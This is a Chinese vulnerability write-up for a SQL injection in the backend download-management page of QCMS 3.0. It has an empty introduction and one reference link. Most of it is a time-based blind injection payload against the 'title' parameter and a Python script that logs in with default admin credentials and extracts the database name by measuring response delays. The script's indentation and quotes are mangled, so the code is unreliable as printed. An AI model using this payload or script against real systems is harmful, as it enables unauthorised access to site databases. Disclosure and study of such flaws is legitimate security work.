QCMS_3.0_sql注入漏洞

# QCMS 3.0 sql注入漏洞

====================

一、漏洞简介
————

二、漏洞影响
————

QCMS 3.0

三、复现过程
————

在后台下载管理处

![](/static/qingy/QCMS_3.0_sql注入漏洞/img/rId24.png)

构造payload

http://www.0-sec.org/backend/down.html?title=1′;select if(ascii(substr((select database()), 1, 1))-113, 1, sleep(5));%23

这里直接附上简单脚本

# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests

def getCookie():
url = ‘http://127.0.0.1/admin.php’
data = {
‘username’:’admin’,
‘password’:’admin’
}

session = requests.session()
res = session.post(url, data)

return requests.utils.dict_from_cookiejar(res.cookies)

def getDatabase(url, arr, cookies):

str = ”
requests.session()

for i in range(1, 11):
for j in arr:
data = url + ‘?title=1\’;select if(ascii(substr((select database()), %s, 1))-%s, 1, sleep(5));%%23′ % (i, ord(j))
# print(data)
res = requests.get(url=data, cookies=cookies)
# print(res.elapsed.total_seconds())
if(res.elapsed.total_seconds() > 5):
str += j
print(str)
break
print(‘database=’ + str)

if __name__ == ‘__main__’:
url = ‘http://127.0.0.1/backend/down.html’
arr = []

for i in range(48, 123):
arr.append(chr(i))

cookies = getCookie()
print(cookies)
getDatabase(url, arr, cookies)

参考链接
——–

> https://xz.aliyun.com/t/7269

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容